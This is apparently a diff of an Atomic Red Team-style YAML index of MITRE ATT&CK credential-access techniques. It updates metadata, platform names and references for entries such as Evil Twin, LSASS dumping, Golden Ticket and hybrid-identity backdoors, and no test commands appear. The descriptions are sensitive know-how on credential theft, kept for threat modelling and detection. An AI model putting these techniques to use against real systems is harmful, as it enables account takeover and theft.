-        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
       - source_name: Medium Detecting Attempts to Steal Passwords from Memory
         description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
           from Memory. Retrieved October 11, 2019.
@@ -44510,14 +45219,6 @@ credential-access:
         description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
           Attacks. Retrieved February 27, 2020.
         url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
-      - source_name: macOS kerberos framework MIT
-        description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
-          for Macintosh Preferences Documentation. Retrieved October 6, 2021.
-        url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
-      - source_name: MIT ccache
-        description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
-          Documentation: Credential Cache. Retrieved October 4, 2021.'
-        url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -44539,23 +45240,14 @@ credential-access:
         description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
           Secret Decoder Ring. Retrieved February 27, 2020.
         url: https://adsecurity.org/?p=227
-      - source_name: Brining MimiKatz to Unix
-        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
-          Mimikatz et al to UNIX. Retrieved October 13, 2021.
-        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
-      - source_name: Linux Kerberos Tickets
-        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
-          Teams. Retrieved October 4, 2021.
-        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555:
     technique:
-      modified: '2024-02-26T14:19:09.417Z'
+      modified: '2024-10-15T14:57:46.850Z'
       name: Credentials from Password Stores
       description: 'Adversaries may search for common password storage locations to
         obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -44606,12 +45298,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555
     atomic_tests: []
   T1552:
     technique:
-      modified: '2024-04-15T21:33:12.892Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Unsecured Credentials
       description: 'Adversaries may search compromised systems to find and obtain
         insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -44623,6 +45314,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Austin Clark, @c2defense
       x_mitre_deprecated: false
@@ -44637,18 +45329,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Application Log: Application Log Content'
@@ -44671,37 +45363,115 @@ credential-access:
         url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1552
+    atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      identifier: T1552
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -44709,9 +45479,9 @@ credential-access:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -44720,21 +45490,22 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -44774,55 +45545,10 @@ credential-access:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ryan Benson, Exabeam
-      - Barry Shteiman, Exabeam
-      - Sylvain Gil, Exabeam
-      - RedHuntLabs, @redhuntlabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
-      type: attack-pattern
-      created: '2020-02-12T18:57:36.041Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.003
-        url: https://attack.mitre.org/techniques/T1555/003
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Microsoft CryptUnprotectData April 2018
-        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
-        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
-          June 18, 2019.
-      - source_name: Proofpoint Vega Credential Stealer May 2018
-        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
-        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
-          in targeted campaign . Retrieved June 18, 2019.
-      - source_name: FireEye HawkEye Malware July 2017
-        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
-        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
-          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
-          2019.
-      - source_name: GitHub Mimikittenz July 2016
-        url: https://github.com/putterpanda/mimikittenz
-        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
-          Retrieved June 20, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-15T14:13:45.294Z'
       name: 'Credentials from Password Stores: Credentials from Web Browsers'
       description: "Adversaries may acquire credentials from web browsers by reading
         files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -44852,6 +45578,12 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ryan Benson, Exabeam
+      - Barry Shteiman, Exabeam
+      - Sylvain Gil, Exabeam
+      - RedHuntLabs, @redhuntlabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Identify web browser files that contain credentials such
         as Google Chrome’s Login Data database file: <code>AppData\Local\Google\Chrome\User
         Data\Default\Login Data</code>. Monitor file read events of web browser files
@@ -44861,23 +45593,58 @@ credential-access:
         reading web browser process memory, utilizing regular expressions, and those
         that contain numerous keywords for common web applications (Gmail, Twitter,
         Office365, etc.).'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Access'
       - 'File: File Access'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+      created: '2020-02-12T18:57:36.041Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/003
+        external_id: T1555.003
+      - source_name: GitHub Mimikittenz July 2016
+        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+          Retrieved June 20, 2019.
+        url: https://github.com/putterpanda/mimikittenz
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Microsoft CryptUnprotectData April 2018
+        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+          June 18, 2019.
+        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+      - source_name: Proofpoint Vega Credential Stealer May 2018
+        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+          in targeted campaign . Retrieved June 18, 2019.
+        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+      - source_name: FireEye HawkEye Malware July 2017
+        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+          2019.
+        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1555.003
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -44914,23 +45681,23 @@ credential-access:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -44963,21 +45730,20 @@ credential-access:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.004:
     technique:
-      modified: '2023-04-12T23:52:08.194Z'
+      modified: '2024-10-04T11:31:56.622Z'
       name: 'Unsecured Credentials: Private Keys'
       description: "Adversaries may search for private key certificate files on compromised
         systems for insecurely stored credentials. Private cryptographic keys and
@@ -44988,7 +45754,7 @@ credential-access:
         as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code>
         on Windows. Adversary tools may also search compromised systems for file extensions
         relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
-        Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+        Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
         device key and a transport key are generated and used to verify the device’s
         identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
         to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -45022,7 +45788,7 @@ credential-access:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
@@ -45050,7 +45816,7 @@ credential-access:
       - source_name: Kaspersky Careto
         description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
           Masked APT. Retrieved July 5, 2017.
-        url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+        url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
       - source_name: Microsoft Primary Refresh Token
         description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
           Retrieved February 21, 2023.
@@ -45061,14 +45827,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Public-key_cryptography
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.004
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -45176,12 +45941,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1003.001:
     technique:
-      modified: '2023-12-27T17:57:20.003Z'
+      modified: '2024-08-13T13:52:45.379Z'
       name: 'OS Credential Dumping: LSASS Memory'
       description: |
         Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -45218,6 +45982,7 @@ credential-access:
       - Edward Millington
       - Ed Williams, Trustwave, SpiderLabs
       - Olaf Hartong, Falcon Force
+      - Michael Forret, Quorum Cyber
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -45230,7 +45995,7 @@ credential-access:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -45280,12 +46045,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.001
     atomic_tests: []
   T1110.003:
     technique:
-      modified: '2024-03-07T14:33:34.201Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Spraying'
       description: |-
         Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -45311,6 +46075,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - John Strand
@@ -45326,18 +46091,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -45364,14 +46129,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.003
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -45382,13 +46144,13 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -45402,6 +46164,7 @@ credential-access:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -45412,12 +46175,12 @@ credential-access:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1003.005:
     technique:
-      modified: '2024-04-18T23:47:54.553Z'
+      modified: '2024-10-15T14:18:59.123Z'
       name: 'OS Credential Dumping: Cached Domain Credentials'
       description: "Adversaries may attempt to access cached domain credentials used
         to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -45492,7 +46255,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.005
     atomic_tests: []
   T1558.001:
@@ -45538,7 +46300,7 @@ credential-access:
         url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
         description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
           Retrieved February 27, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-05T16:07:03.779Z'
       name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
       description: "Adversaries who have the KRBTGT account password hash may forge
         Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
@@ -45573,16 +46335,14 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.001
     atomic_tests: []
   T1649:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal or Forge Authentication Certificates
       description: |-
-        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
